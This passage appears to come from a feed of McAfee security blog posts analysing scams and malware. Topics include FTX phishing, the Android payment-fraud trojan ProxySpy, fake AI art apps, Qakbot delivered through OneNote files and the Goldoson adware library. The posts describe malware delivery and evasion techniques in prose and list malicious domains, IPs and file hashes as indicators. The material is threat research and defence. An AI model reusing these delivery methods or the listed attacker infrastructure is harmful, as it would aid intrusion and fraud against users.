For more on how you can bet online safely, and for details on how legalized online betting works in the U.S., check out our blog on the topic.  

Keep that Connection Secure 

Using a free public Wi-Fi connection is risky. User data on these networks is unprotected, which makes it vulnerable to cyber criminals. Whether you’re traveling to Qatar for a match or watching the them with friends at your favorite pub, if you’re connecting to a public Wi-Fi connection, make sure you use a trusted VPN connection. 

Give scammers a straight red card this World Cup 

For more information on scams, visit our scam education page. Hopefully, with these tips, you’ll be able to enjoy and participate in some of the World Cup festivities, after all, fun is the goal!  

The post Don’t Get Caught Offsides with These World Cup Scams appeared first on McAfee Blog.

Following up on our previous blog, How to Stop the Popups, McAfee Labs saw a sharp decrease in the number of deceptive push notifications reported by McAfee consumers running Microsoft’s Edge browser on Windows.

Such browser-delivered push messages appear as toaster pop-ups in the tray above the system clock and are meant to trick users into taking various actions, such as installing software, purchasing a subscription, or providing personal information.

Upon further investigation, this major drop seems to be associated with a change in the behavior of the Edge browser with two notable improvements over older versions.

First, when users visit websites known to deliver deceptive push notifications, Edge blocks authorization prompts that could trick users into opting-in to receive popups:

Second, when unwanted popups do occur, it is now easier than ever to disable them, on a per-site basis.  Users can simply click the three dots (…) on the right of the notification and choose to “Turn off all notifications for” the domain responsible for the popup.

This is a great improvement over the previous experience of having to manually navigate browser settings to achieve the desired result.

Earlier this year, 9TO5Google reported a Chrome code change may be indicative of a similar crack down by Google on nefarious popups.

One can hope Google will follow Microsoft’s example to improve browser security and usability.

The post Microsoft’s Edge over Popups (and Google Chrome) appeared first on McAfee Blog.

Authored by Oliver Devane 

It hasn’t taken malicious actors long to take advantage of the recent bankruptcy filing of FTX,  McAfee has discovered several phishing sites targeting FTX users.  

One of the sites discovered was registered on the 15th of November and asks users to submit their crypto wallet phrase to receive a refund. After entering this phrase, the creators of the site would gain access to the victim’s crypto wallet and they would likely transfer all the funds out of it. 

Upon analyzing the website code used to create the phishing sites, we noticed that they were extremely similar to previous sites targeting WalletConnect customers, so it appears that they likely just modified a previous phishing kit to target FTX users.  

The image below shows a code comparison between a website from June 2022, and it shows that the FTX phishing site shares most of its code with it.  

McAfee urges anyone who was using FTX to be weary of any unsolicited emails or social media messages they receive and to double-check the authenticity before accessing them. If you are unsure of the signs to look for, please check out the McAfee Scam education portal (https://www.mcafee.com/consumer/en-us/landing-page/retention/scammer-education.html) 

McAfee customers are protected against the sites mentioned in this blog 

Type	Value	Product	Detected
URL	ftx-users-refund[.]com	McAfee WebAdvisor	Blocked
URL	ftx-refund[.]com	McAfee WebAdvisor	Blocked

 

The post Threat Actors Taking Advantage of FTX Bankruptcy  appeared first on McAfee Blog.

Authored by SangRyol Ryu and Yukihiro Okutomi 

McAfee’s Mobile Research team recently analyzed new malware targeting mobile payment users in Japan. The malware which was distributed on the Google Play store pretends to be a legitimate mobile security app, but it is in fact a payment fraud malware stealing passwords and abusing reverse proxy targeting the mobile payment services. McAfee researchers notified Google of the malicious apps, スマホ安心セキュリティ, or ‘Smartphone Anshin Security’, package name ‘com.z.cloud.px.app’ and ‘com.z.px.appx’. The applications are no longer available on Google Play. Google Play Protect has also taken steps to protect users by disabling the apps and providing a warning. McAfee Mobile Security products detect this threat as Android/ProxySpy.  

How do victims install this malware? 

The malware actor continues to publish malicious apps on the Google Play Store with various developer accounts. According to the information posted on Twitter by Yusuke Osumi, Security Researcher at Yahoo! Japan, the attacker sends SMS messages from overseas with a Google Play link to lure users to install the malware. To attract more users, the message entices users to update security software. 

A SMS message from France (from Twitter post by Yusuke)

Malware on Google Play 

The Mobile Research team also found that the malware actor uses Google Drive to distribute the malware. In contrast to installing an application after downloading an APK file, Google Drive allows users to install APK files without leaving any footprint and makes the installation process simpler. Once the user clicks the link, there are only a few more touches required to run the application. Only three clicks are enough if users have previously allowed the installation of unknown apps on Google Drive. 

Following notification from McAfee researchers, Google has removed known Google Drive files associated with the malware hashes listed in this blog post. 

 

What does this malware look like?

When a user installs and launches this malware, it asks for the Service password. Cleverly, the malware shows incorrect password messages to collect the more precise passwords. Of course, it does not matter whether the password is correct or not. It is a way of getting the Service password. The Service password is used for the payment service which provides easy online payments. The user can start this payment service by setting a Service password. The charge will be paid along with the mobile phone bill. 

How does this malware work?

There is a native library named ‘libmyapp.so’ loaded during the app execution written in Golang. The library, when loaded, tries to connect to the C2 server using a Web Socket. Web Application Messaging Protocol (WAMP) is used to communicate and process Remote Procedure Calls (RPC). When the connection is made, the malware sends out network information along with the phone number. Then, it registers the client’s procedure commands described in the table below. The web socket connection is kept alive and takes the corresponding action when the command is received from the server like an Agent. And the socket is used to send the Service password out to the attacker when the user enters the Service password on the activity. 

RPC Function name	Description
connect_to	Create reverse proxy and connect to remote server
disconnect	Disconnect the reverse proxy
get_status	Send the reverse proxy status
get_info	Send line number, connection type, operator, and so on
toggle_wifi	Set the Wi-Fi ON/OFF
show_battery_opt	Show dialog to exclude battery optimization for background work

Registered RPC functions description 

To make a fraudulent purchase by using leaked information, the attacker needs to use the user’s network. The RPC command ‘toggle_wifi’ can switch the connection state to Wi-Fi or cellular network, and ‘connect_to’ will provide a reverse proxy to the attacker. A reverse proxy can allow connecting the host behind a NAT (Network Address Translation) or a firewall. Via the proxy, the attacker can send purchase requests via the user’s network. 

Conclusion

It is an interesting point that the malware uses a reverse proxy to steal the user’s network and implement an Agent service with WAMP. McAfee Mobile Research Team will continue to find this kind of threat and protect our customers from mobile threats. It is recommended to be more careful when entering a password or confidential information into untrusted applications. 

IoCs (Indicators of Compromise) 

193[.]239[.]154[.]23
91[.]204[.]227[.]132
ruboq[.]com 

SHA256	Package Name	Distribution
5d29dd12faaafd40300752c584ee3c072d6fc9a7a98a357a145701aaa85950dd	com.z.cloud.px.app	Google Play
e133be729128ed6764471ee7d7c36f2ccb70edf789286cc3a834e689432fc9b0	com.z.cloud.px.app	Other
e7948392903e4c8762771f12e2d6693bf3e2e091a0fc88e91b177a58614fef02	com.z.px.appx	Google Play
3971309ce4a3cfb3cdbf8abde19d46586f6e4d5fc9f54c562428b0e0428325ad	com.z.cloud.px.app2	Other
2ec2fb9e20b99f60a30aaa630b393d8277949c34043ebe994dd0ffc7176904a4	com.jg.rc.papp	Google Drive
af0d2e5e2994a3edd87f6d0b9b9a85fb1c41d33edfd552fcc64b43c713cdd956	com.de.rc.seee	Google Drive

 

The post Fake Security App Found Abuses Japanese Payment System appeared first on McAfee Blog.

Authored by Fernando Ruiz

The popularity of AI-based mobile applications that can create artistic images based on pictures, such as the “Magic Avatars” from Lensa, and the OpenAI service DALL-E 2 that generates them from text, have increased the mainstream interest of these tools. Users should be aware of those seeking to take advantage to distribute Potential Unwanted Programs (PUPs) or malware, such as through deceptive applications that promise the same or similar advanced features but are just basic image editors or otherwise repackaged apps that can drain your data plan and battery life with Clicker and HiddenAds behaviors, subscribe you to expensive services that provide little or no value over alternatives  (Fleeceware), or even steal your social media account credentials (FaceStealer).

Dozens of apps surface daily claiming to offer AI image creation. Some of them might be legitimate or based on open-source projects such as Stable Diffusion, but in the search for a free application that produces quality results, users might try new apps that could compromise their privacy, user experience, wallet and/or security.

The McAfee Mobile Research Team recently discovered a series of repackaged image editors on the Google Play app store which presented concerning behaviors.  McAfee Mobile Security products help protect against such apps, including those classified as Android/FakeApp, Android/FaceStealer, Android/PUP.Repacked and Android/PUP.GenericAdware.

McAfee, a member of the App Defense Alliance focused on protecting users by preventing threats from reaching their devices and improving app quality across the ecosystem, reported the discovered apps to Google, which took prompt action and the apps are no longer available on Google Play.

We now discuss various types of privacy and/or security risks associated with the types of apps recently removed from the app store.

FaceStealer

“Pista – Cartoon Photo Effect” and “NewProfilePicture” are examples of apps that offered compelling visual results, however, each was based on the same image editor with basic filters and trojanized with Android/FaceStealer, which is a well-known malware capable of compromising a victim’s Facebook or Instagram account. The apps could capture user credentials during a Facebook login by embedding a javascript function loaded from a remote server (to evade detection) into a flutter webview activity that displays the Facebook login screen. 

“NewProfilePicture” and “Pista – Cartoon Photo Effect” are examples of FaceStealer malware that posed as a cartoon avatar creator.

The same image editor which was repackaged into the above two apps has also been repackaged alternatively with adware modules and distributed by other developers under other app names, such as “Cartoon Effect | Cartoon Photo”:  

 

Fleeceware

Fleeceware refers to mobile apps that use various tactics to enroll users into subscriptions with high fees, typically after a free trial period, and often with little or no value to the subscriber beyond cheaper or free alternatives. If the user does not take care to cancel their subscription, they continue to be charged even after deleting the app.

“Toonify Me”, which is no longer available on the Play Store, cost $49.99 per week after 3 days – almost $2,600 per year – for what featured AI-generated illustrations in the app description, but was another repackaged version of the same image editor functionality found within “NewProfilePicture” and “Pista – Cartoon Photo Effect”. 

In this case, the “Toonify Me” app did not allow feature access without enrolling in the subscription, and the “CONTINUE” button which initiated the subscription was the only option to tap in the app once it was launched.

Adware

Promoted by ads that described it as capable of transforming pictures into artistic drawings, the “Fun Coloring – Paint by Number” app is an example of a repackaged version of a different, legitimate pixel painting app.  It lacked the advertised AI effects and was plagued with adware-like behavior.  

Advertisement of “Fun Coloring – Paint by Number” on social media which included app store link 

Consistent with many reviews complaining about unexpected ads out of the context of the app, once installed, the app started a service that communicated in the background with Facebook Graph API every 5 seconds and might pull ads based on received commands after some time of execution. The app contained multiple injected SDK modules from AppsFlyer, Fyber, InMobi, IAB, Mintegral, PubNative and Smaato (none of which are in the original app, which was repackaged to include these), which would help monetize installations without regard for user experience. 

Conclusion

When new types of apps become popular and new ones appear on the market to offer similar features, users should act with caution to avoid becoming victim to those wanting to exploit public interest.

When installing an app that causes you doubt, make sure you:

• Read the pricing and other terms carefully
• Check those permissions requested are reasonable with the purpose of the app
• Look for consistently bad reviews describing unexpected or unwanted app behavior
• Verify if the developer has other apps available and their reviews
• Consider skipping the app download if you aren’t convinced of its safety

Even if an app is legitimate, we also encourage users to look closely before installation at any available privacy policy to understand how personal data will be treated.  Your face is a biometric identifier that’s not easy to change, and multiple pictures might be needed (and stored) to create your model.

Artificial intelligence tools will continue to amaze us with their capabilities and probably will become more accessible and safer to use over time.  For now, keep in mind that AI technology is still limited and experimental, and can be expensive to use – always consider any hidden costs.  AI also will bring more challenges as we discussed on the 2023 McAfee Threat Prediction blog.

IDENTIFIED APPS

The following table lists the application package name, hash sum SHA256, the minimum number of installations on Google Play, and the type of detected threat. These apps were removed from Google Play, but some may remain available elsewhere.

Package Name	SHA256	Installs	Type
com.ayogamez.sketchcartoon	9cb1d996643fbec26bb9878939735221dfbf639075ceea3abdb94e0982c494c1	5M	Adware
com.rocketboosterapps.toonifyme	3f45a38b103e1812146df8ce179182f54c4a0191e19560fcbd77240cbc39886b	10K	Fleeceware
com.nhatanhstudio.cartoon.photoeffect	2c7f4fc403d1449b70218624d8a409497bf4694493c7f4c06cd8ccecff21799a	5K	Repackaged Adware
com.cambe.PhotoCartoon	5327f415d0e9b21523f64403ec231e1fd0279c48b41f023160cd1d70dd733dbf	10K	Repackaged Adware
com.chiroh.cartoon.prismaeffect	18fef9f92639e31dd6566854feb30e1e4333b971b05ae9aba93ac0aa395c955b	1K	Repackaged Adware
cartoon.photo.effect.editor.cartoon.maker.online. caricature.appanime.convert.photo.intocartoon	3b941b7005572760b95239d73b8a8bbfdb81d26d405941171328daa8f3c01183	50	Repackaged Adware
com.waxwell.saunders.pistaphotoeditor	489d4aaec3bc694ddd124ab8b4f0b7621a51aad13598fd39cd5c3d2067b950e5	50	FaceStealer
com.ashtoon.tooncool.skordoi	980c090c01bef890ef74bd93e181d67a5c6cd1b091573eaaf2e1988756aacd50	100K	FaceStealer
com.faceart.savetoon.cartoonedit	55ffc2e392280e8967de0857b02946094268588209963c6146dad01ae537daca	100	FaceStealer
com.okenyo.creatkartoon.studio	e696d7304e5f56d7125dd54c853ff35a394a4175fcaf7785d332404e161d6deb	500K	FaceStealer
com.onlansuyanto.editor.bading	59f9630c2ebe4896f585ec7722c43bb54c926e3e915dcfa4ff807bea444dc07b	10K	FaceStealer
com.madtoon.aicartoon.kiroah	c29adfade300dde5e9c31b23d35a6792ed4a7ad8394d37b69b5cecc931a7ad9f	100K	FaceStealer
com.acetoon.studio.facephoto	24cf7fcaefe98bc9db34f551d11906d3f1349a5b60adf5fa37f15a872b61ee95	100K	FaceStealer
com.funcolornext.beautyfungoodcolor	b2cfa8b2eccecdcb06293512df0db463850704383f920e5782ee6c5347edc6f5	100K	Repackaged Adware

 

 

The post The Rise and Risks of AI Art Apps appeared first on McAfee Blog.

Authored By Anandeshwar Unnikrishnan,Sakshi Jaiswal,Anuradha M 

McAfee Labs has recently observed a new Malware campaign which used malicious OneNote documents to entice users to click on an embedded file to download and execute the Qakbot trojan. 

OneNote is a Microsoft digital notebook application that can be downloaded for free. It is a note-taking app that allows collaboration across organizations while enabling users to embed files and other artifacts. It is installed by default in Microsoft Office 2021 and Microsoft 365.   

Malicious Actors are always trying to find new ways in to infect their victims. Such as their shift to LNK files after Microsoft introduced a policy change disabled office macros by default. Due to a feature that allows users to attach files to OneNote documents it makes them a good alternative to LNK files as distribution vehicle to deploy their malware. This blog contains analysis on how OneNote documents are used malicious and two specific campaigns that made use of OneNote documents to download and execute the Qakbot malware.  

OneNote Campaigns in the wild 

Figure 1  shows the geo wise distribution of McAfee customers detecting malicious OneNote files. 

 Based on the telemetry from our endpoints we have identified the following threat families deployed through OneNote documents: 

• Iceid 
• Qakbot
• RedLine
• AsyncRat
• Remcos
• AgentTesla
• QuasarRAT
• XWORM
• Netwire
• Formbook
• Doubleback 

Overview Of Malicious OneNote Documents 

A holistic view of the phishing campaigns that weaponize OneNote document is shown in Figure 2 below.  The malicious document is delivered in either zip files or ISO images to the target through phishing emails. We have observed that most of the malicious documents either have Windows batch script that invokes Powershell for dropping the malware on the system or Visual Basic scripts that does the same.

The generic theme of the email is invoice or legal related. These types of themes are more likely to be opened by the vicim. An example email body and attachment is shown in Figure 3 and 4. 

A Deep Dive into OneNote File Format 

File Header 

To understand how the data is laid out in the file, we need to examine it at byte level. Taking a close look at OneNote document gives us an interesting observation as its magic bytes for the header is not a trivial one. Figure 5 shows the first 16 bytes of the document binary. 

The first 16 bytes need to be interpreted as GUID value {7B5C52E4-D88C-4DA7-AEB1-5378D02996D3}. We can use the official documentation for OneNote specification to make sense of all the bytes and its structuring. Figure 6 shows header information taken from the OneNote specification document. 

The Data Stream in OneNote, Say Hello To FileDataStoreObject 

To find the embedded data in a OneNote document, we need to learn more about the FileDataStoreObject which has a GUID value of {BDE316E7-2665-4511-A4C4-8D4D0B7A9EAC}. The structure that holds the data is shown below: 

• guidHeader (16 bytes) 
• Size: 16 bytes 
• Value: {BDE316E7-2665-4511-A4C4-8D4D0B7A9EAC} 
• cbLength 
• Size: 8 bytes 
• Value: Size of the data 
• unused 
• Size: 4 bytes 
• reserved 
• Size: 8 bytes 
• FileData 
• Size: Variable 
• guidFooter 
• Size: 16 bytes 
• Value: {71FBA722-0F79-4A0B-BB13-899256426B24} 

The FileData member of the FileDataStoreObject is the key member that holds the embedded data in the OneNote document. The size can be retrieved from the cbLength member. 

Figure 7 shows the “on disk” representation of the FileDataStoreObject  This is taken from a malicious OneNote document used to spread the Qakbot payload. The guidHeader for the data object is highlighted in yellow and the data is shown in red. As it is evident from the image the data represents a text file which is a script to launch PowerShell.  

For more information on the OneNote specification, go to reference section  

Artifact Extraction  

Now we have an idea of what the data object is, with this knowledge we can automate the process of extracting embedded artifacts for further analysis from the OneNote document by following the below algorithm. 

• Search for FileDataStoreObject GUID in the binary. 
• Interpret the FileDataStoreObject structure  
• Retrieve cbLength member (size of the data represented by FileDataStoreObject) 
• Read N bytes (cbLength) after Reserved 8 bytes in FileDataStoreObject. 
• Dump the bytes read on to disk 
• Repeat above steps for every FileDataStoreObject present in the binary

Embedded Executable Objects In OneNote  

Execution Of Embedded Entities  

Looking at the runtime characteristics of OneNote Desktop application we have observed that when an embedded file gets executed by the user, it is stored temporarily in the OneNote directory in the User’s Temp location. Each directory with GUID values represents a different document opened in the OneNote application. 

By analyzing numerous malicious documents, we have been able to create a “test” OneNote document that executes a batch file that contains the “whoami” command. The image in Figure  9 show the batch file being created in the user’s temp location. 

Qakbot Campaign 1: 

This section contains specific details on a Qakbot campaign. In campaign 1, the malware author used phishing emails to deliver malicious OneNote document either as attachment or a URL link to zip file containing the OneNote document. The OneNote contained aHTA file that once executed would make use of  the curl utility to download Qakbot and then execute it. 

Infection Flow: 

• Spam email delivers a malicious OneNote file as an attachment or a link to a ZIP file that contains a OneNote file. 
• OneNote file contains an embedded HTA  attachment and a fake message to lure users to execute the HTA  file 
• The HTA file uses curl utility to download the Qakbot payload and is executed by rundll32.exe. 

Technical Analysis: 

The OneNote file with the embedded HTA file is shown in the Figure 11. Once this OneNote file is opened, it prompts the user with a fake message to double-click on open to view the attachment. 

Upon clicking the Open button, it drops the HTA file with the name Open.hta to the %temp% Folder and executes it using mshta.exe. 

The HTA file contains obfuscated script as shown below: 

The HTA file is loaded by MSHTA and creates a registry key in HKEY_CURRENT_USER\SOFTWARE\ with obfuscated content as shown below: 

• The obfuscated registry is then read by MSHTA and the obfuscated code is de-obfuscated. The code is then initialized to a new function object as shown in Block1. 
• Finally, MSHTA calls this function by passing the malicious URL as a parameter and then deletes the registry key as shown in Block 2.

De-obfuscated content from the HTA file is shown below: 

• Curl is used to download the malicious DLL file in C:\ProgramData Folder with .png extension. The script will then execute the downloaded file with Rundll32.exe with the export function Wind.

• A fake error message is displayed after loading the downloaded payload and MSHTA is terminated.  

Figure 18 shows the process tree of Qakbot: 

IOCs: 

Type	Value	Product	Detected
Campain 1 – OneNote File	88c24db6c7513f47496d2e4b81331af60a70cf8fb491540424d2a0be0b62f5ea	Total Protection and LiveSafe	VBS/Qakbot.a
Campain 1 – HTA File	e85f2b92c0c2de054af2147505320e0ce955f08a2ff411a34dce69c28b11b4e4	Total Protection and LiveSafe	VBS/Qakbot.b
Campain 1 – DLL File	15789B9b6f09ab7a498eebbe7c63b21a6a64356c20b7921e11e01cd7b1b495e3	Total Protection and LiveSafe	Qakbot-FMZ

Campaign 2: 

Examining Malicious OneNote Documents 

The OneNote document for campaign 2 is shown in Figure 19. At first glance it it appears that there is a ‘Open’ button embedded within the document. The message above the ‘Open’ button instructs the user to “double click” in order to receive the attachment.

A closer look at the document reveals the graphical elements are all images placed in a layered style by the malicious actor. By moving the icons aside, we can see the malicious batch file which when executed downloads the payload from the Internet and executes on the target system. 

Execution Of Payload Dropper 

Upon execution of the batch file, Powershell will be invoked and it fetch the Qakbot payload from Internet and execute it on the target system. This section will cover details of dropper script used to deploy QakBot. The Figure 21 Show the process tree after the execution of the script and you can see that powershell.exe was launched by cmd.exe and the parent of cmd.exe is onenote.exe. 

The contents of process cmd.exe (7176) are shown below.  

The base64 decoded batch file is shown in Figure 23.  This will use powershell to download the payload and then execute it with rundll32.exe

 IOCS 

Type	Value	Product	Detected
Campain 2 – Zip File	000fb3799a741d80156c512c792ce09b9c4fbd8db108d63f3fdb0194c122e2a1	Total Protection and LiveSafe	VBS/Qakbot.a
Campain 2 – OneNote File	2bbfc13c80c7c6e77478ec38d499447288adc78a2e4b3f8da6223db9e3ac2d75	Total Protection and LiveSafe	One/Downloader.a
Campain 2 – Powershell File	b4dd3e93356329c076c0d2cd5ac30a806daf46006bdb81199355952e9d949424	Total Protection and LiveSafe	PS/Agent.gs
Campain 2 – OneNoteFile	a870d31caea7f6925f41b581b98c35b162738034d5d86c0c27c5a8d78404e860	Total Protection and LiveSafe	VBS/Qakbot.a

Domains: 

starcomputadoras.com 

Conclusion: 

Malware authors are getting more sophisticated when it comes to hiding their payloads. This Blog highlights the recent Qakbot campaign that delivers its payload which uses the OneNote application as a delivery mechanism. McAfee Customers should keep their systems up-to-date and refrain from clicking links and opening attachments in suspicious emails to stay protected. 

 References: 

https://learn.microsoft.com/en-us/openspecs/office_file_formats/ms-onestore/405b958b-4cb7-4bac-81cc-ce0184249670 

https://learn.microsoft.com/en-us/openspecs/office_file_formats/ms-onestore/8806fd18-6735-4874-b111-227b83eaac26 

The post The Rising Trend of OneNote Documents for Malware delivery appeared first on McAfee Blog.

Authored by SangRyol Ryu

McAfee’s Mobile Research Team discovered a software library we’ve named Goldoson, which collects lists of applications installed, and a history of Wi-Fi and Bluetooth devices information, including nearby GPS locations. Moreover, the library is armed with the functionality to perform ad fraud by clicking advertisements in the background without the user’s consent. The research team has found more than 60 applications containing this third-party malicious library, with more than 100 million downloads confirmed in the ONE store and Google Play app download markets in South Korea. While the malicious library was made by someone else, not the app developers, the risk to installers of the apps remains. 

McAfee Mobile Security detects this threat as Android/Goldoson and protects customers from this and many other mobile threats. McAfee is a member of the App Defense Alliance focused on protecting users by preventing threats from reaching their devices and improving app quality across the ecosystem. We reported the discovered apps to Google, which took prompt action. Google has reportedly notified the developers that their apps are in violation of Google Play policies and fixes are needed to reach compliance. Some apps were removed from Google Play while others were updated by the official developers. Users are encouraged to update the apps to the latest version to remove the identified threat from their devices. 

Top 9 applications previously infected by Goldoson on Google Play

How does it affect users? 

The Goldoson library registers the device and gets remote configurations at the same time the app runs. The library name and the remote server domain varies with each application, and it is obfuscated. The name Goldoson is after the first found domain name. 

Remote configuration contains the parameters for each of functionalities and it specifies how often it runs the components. Based on the parameters, the library periodically checks, pulls device information, and sends them to the remote servers. The tags such as ‘ads_enable’ or ‘collect_enable’ indicates each functionality to work or not while other parameters define conditions and availability. 

A response of remote configuration

The library includes the ability to load web pages without user awareness. The functionality may be abused to load ads for financial profit. Technically, the library loads HTML code and injects it into a customized and hidden WebView and it produces hidden traffic by visiting the URLs recursively. 

Collected data is sent out periodically every two days but the cycle is subject to change by the remote configuration. The information contains some sensitive data including the list of installed applications, location history, MAC address of Bluetooth and Wi-Fi nearby, and more. This may allow individuals to be identified when the data is combined. The following tables show the data observed on our test device. 

Google Play considers the list of installed apps to be personal and sensitive user data and requires a special permission declaration to get it. Users with Android 11 and above are more protected against apps attempting to gather all installed apps. However, even with the recent version of Android, we found that around 10% of the apps with Goldoson have the permission “QUERY_ALL_PACKAGES” that allows them to access app information. 

Likewise, with Android 6.0 or higher, users may be asked for permissions such as Location, Storage, or Camera at runtime. If user allows the location permission, the app can access not only GPS data but also Wi-Fi and Bluetooth device information nearby. Based on BSSID (Basic Service Set Identifier) and RSSI (Received Signal Strength Indicator), the application can determine the location of the device more accurately than GPS, especially indoors. 

A demo of runtime permission request

Where do the apps come from?

The infected applications come from various Android application stores. More than 100 million downloads have been tracked through Google Play. After that, ONE store, Korea’s leading app store, follows with about 8 million installations. 

Conclusion

As applications continue to scale in size and leverage additional external libraries, it is important to understand their behavior. App developers should be upfront about libraries used and take precautions to protect users’ information. McAfee Mobile Security products can also help detect threats and protect you from not only malware but also unwanted programs. For more information, visit our McAfee Mobile Security. 

Identified Apps and Goldoson Domains

Domains

• bhuroid.com
• enestcon.com
• htyyed.com
• discess.net
• gadlito.com
• gerfane.com
• visceun.com
• onanico.net
• methinno.net
• goldoson.net
• dalefs.com
• openwor.com
• thervide.net
• soildonutkiel.com
• treffaas.com
• sorrowdeepkold.com
• hjorsjopa.com
• dggerys.com
• ridinra.com
• necktro.com
• fuerob.com
• phyerh.net
• ojiskorp.net
• rouperdo.net
• tiffyre.net
• superdonaldkood.com
• soridok2kpop.com

List of Apps and Current Status

Package Name	Application Name	GooglePlay Downloads	GP Status
com.lottemembers.android	L.POINT with L.PAY	10M+	Updated*
com.Monthly23.SwipeBrickBreaker	Swipe Brick Breaker	10M+	Removed**
com.realbyteapps.moneymanagerfree	Money Manager Expense & Budget	10M+	Updated*
com.skt.tmap.ku	TMAP – 대리,주차,전기차 충전,킥보 …	10M+	Updated*
kr.co.lottecinema.lcm	롯데시네마	10M+	Updated*
com.ktmusic.geniemusic	지니뮤직 – genie	10M+	Updated*
com.cultureland.ver2	컬쳐랜드[컬쳐캐쉬]	5M+	Updated*
com.gretech.gomplayerko	GOM Player	5M+	Updated*
com.megabox.mop	메가박스(Megabox)	5M+	Removed**
kr.co.psynet	LIVE Score, Real-Time Score	5M+	Updated*
sixclk.newpiki	Pikicast	5M+	Removed**
com.appsnine.compass	Compass 9: Smart Compass	1M+	Removed**
com.gomtv.gomaudio	GOM Audio – Music, Sync lyrics	1M+	Updated*
com.gretech.gomtv	곰TV – All About Video	1M+	Updated*
com.guninnuri.guninday	전역일 계산기 디데이 곰신톡–군인 …	1M+	Updated*
com.itemmania.imiapp	아이템매니아 – 게임 아이템 거래 …	1M+	Removed**
com.lotteworld.android.lottemagicpass	LOTTE WORLD Magicpass	1M+	Updated*
com.Monthly23.BounceBrickBreaker	Bounce Brick Breaker	1M+	Removed**
com.Monthly23.InfiniteSlice	Infinite Slice	1M+	Removed**
com.pump.noraebang	나홀로 노래방–쉽게 찾아 이용하는 …	1M+	Updated*
com.somcloud.somnote	SomNote – Beautiful note app	1M+	Removed**
com.whitecrow.metroid	Korea Subway Info : Metroid	1M+	Updated*
kr.co.GoodTVBible	GOODTV다번역성경찬송	1M+	Removed**
kr.co.happymobile.happyscreen	해피스크린 – 해피포인트를 모으 …	1M+	Updated*
kr.co.rinasoft.howuse	UBhind: Mobile Tracker Manager	1M+	Removed**
mafu.driving.free	스피드 운전면허 필기시험 …	1M+	Removed**
com.wtwoo.girlsinger.worldcup	이상형 월드컵	500K+	Updated*
kr.ac.fspmobile.cu	CU편의점택배	500K+	Removed**
com.appsnine.audiorecorder	스마트 녹음기 : 음성 녹음기	100K+	Removed**
com.camera.catmera	캣메라 [순정 무음카메라]	100K+	Removed**
com.cultureland.plus	컬쳐플러스:컬쳐랜드 혜택 더하기 …	100K+	Updated*
com.dkworks.simple_air	창문닫아요(미세/초미세먼지/WHO …	100K+	Removed**
com.lotteworld.ticket.seoulsky	롯데월드타워 서울스카이	100K+	Updated*
com.Monthly23.LevelUpSnakeBall	Snake Ball Lover	100K+	Removed**
com.nmp.playgeto	게토(geto) – PC방 게이머 필수 앱	100K+	Removed**
com.note.app.memorymemo	기억메모 – 심플해서 더 좋은 메모장	100K+	Removed**
com.player.pb.stream	풀빵 : 광고 없는 유튜브 영상 …	100K+	Removed**
com.realbyteapps.moneya	Money Manager (Remove Ads)	100K+	Updated*
com.wishpoke.fanciticon	Inssaticon – Cute Emoticons, K	100K+	Removed**
marifish.elder815.ecloud	클라우드런처	100K+	Updated*
com.dtryx.scinema	작은영화관	50K+	Updated*
com.kcld.ticketoffice	매표소–뮤지컬문화공연 예매& …	50K+	Updated*
com.lotteworld.ticket.aquarium	롯데월드 아쿠아리움	50K+	Updated*
com.lotteworld.ticket.waterpark	롯데 워터파크	50K+	Updated*
com.skt.skaf.l001mtm091	T map for KT, LGU+	50K+	Removed**
org.howcompany.randomnumber	숫자 뽑기	50K+	Updated*
com.aog.loader	로더(Loader) – 효과음 다운로드 앱	10K+	Removed**
com.gomtv.gomaudio.pro	GOM Audio Plus – Music, Sync l	10K+	Updated*
com.NineGames.SwipeBrickBreaker2	Swipe Brick Breaker 2	10K+	Removed**
com.notice.safehome	안심해 – 안심귀가 프로젝트	10K+	Removed**
kr.thepay.chuncheon	불러봄내 – 춘천시민을 위한 공공  …	10K+	Removed**
com.curation.fantaholic	판타홀릭 – 아이돌 SNS 앱	5K+	Removed**
com.dtryx.cinecube	씨네큐브	5K+	Updated*
com.p2e.tia.tnt	TNT	5K+	Removed**
com.health.bestcare	베스트케어–위험한 전자기장, …	1K+	Removed**
com.ninegames.solitaire	InfinitySolitaire	1K+	Removed**
com.notice.newsafe	안심해 : 안심지도	1K+	Removed**
com.notii.cashnote	노티아이 for 소상공인	1K+	Removed**
com.tdi.dataone	TDI News – 최초 데이터 뉴스 앱 …	1K+	Removed**
com.ting.eyesting	눈팅 – 여자들의 커뮤니티	500+	Removed**
com.ting.tingsearch	팅서치 TingSearch	50+	Removed**
com.celeb.tube.krieshachu	츄스틱 : 크리샤츄 Fantastic	50+	Removed**
com.player.yeonhagoogokka	연하구곡	10+	Removed**

* Updated means that the recent application on Google Play does not contain the malicious library. 

** Removed means the application is not available on Google Play as of the time of posting. 

The post Goldoson: Privacy-invasive and Clicker Android Adware found in popular apps in South Korea appeared first on McAfee Blog.

Authored by Lakshya Mathur and Sriram P 

McAfee Intelligence observed a huge spike in extortion email frauds over the past month. The intent of these fraudulent activities is to intimidate individuals into paying a specified amount of money as a ransom. 

Figure 1 shows the number of blackmail emails received over a month recently. 

Figure 1 – Stats for 20 February 2023 – 23rd March 2023

 

In this blog, we’ll delve into frauds that are becoming increasingly common in the digital age. We’ll first define what these frauds are and provide examples to help readers better understand the nature of these frauds. Additionally, we’ll explore how these frauds are on the rise, highlighting the reasons behind this trend and the impact it has on individuals. 

Finally, we’ll provide practical advice to help consumers protect themselves from these types of attacks. This will include a discussion of some of the most effective measures individuals can take to safeguard their personal and financial information from fraudsters. 

What are Extortion Frauds? 

Extortion emails are a type of scam where cybercriminals send threatening messages to individuals or organizations—demanding payment in exchange for not releasing sensitive or embarrassing information. These emails typically claim that the sender has compromising information, such as private photos or personal data, and threaten to share it with the recipient’s friends, family, or the public unless a payment is made. The payment is usually asked in the form of cryptocurrency, such as Bitcoin in the recent spam, which is difficult to trace and can be transferred quickly and anonymously. The goal of these emails is to scare the recipient into paying the demanded amount, even though there might not be any compromising information to release. 

Examples of Extortion fraud 

Scammers use different scareware sentiments like bad internet browsing habits, hacking for Wi-Fi, and hacking of networks because of hardware vulnerabilities. We’ll now examine various illustrations of extortion emails and analyze scammers’ strategies to intimidate victims into providing payment. By presenting various real-life examples, we can demonstrate how scammers use scareware tactics to manipulate and intimidate their victims into complying with their demands. By instilling fear, the scammers hope to provoke a sense of urgency in the victim, increasing the likelihood that they will pay the demanded ransom. 

Figure 2 – Extortion fraud Example 1 

 

